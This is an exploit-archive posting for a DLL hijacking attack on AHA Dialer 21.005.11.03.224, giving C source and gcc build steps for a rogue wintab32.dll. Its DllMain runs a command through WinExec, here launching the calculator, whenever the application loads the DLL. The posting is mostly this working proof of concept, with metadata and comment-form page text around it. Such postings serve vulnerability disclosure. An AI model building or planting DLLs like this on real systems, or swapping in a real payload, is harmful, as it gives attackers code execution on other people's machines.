AHA Dialer 21.005.11.03.224 DLL Hijacking Exploit (wintab32.dll)

2017.05.06

Febriyanto Nugroho (ID)

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

/*
 
Exploit Title : AHA Dialer 21.005.11.03.224 DLL Hijacking Exploit (wintab32.dll)
Exploit Author : Febriyanto Nugroho < f.nugroho8@gmail.com >
Tested on : Windows 7 (Version 6.1 Service Pack 1) 32-bit  

gcc -shared -o wintab32.dll aha-dialer-exploit.c

 */

#include <windows.h>

int exploit() {
   WinExec("calc", 0);
   exit(0);
   return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdReason, LPVOID lpvReserved) {
  exploit();
  return 0;
}

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

AHA Dialer 21.005.11.03.224 DLL Hijacking Exploit (wintab32.dll)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.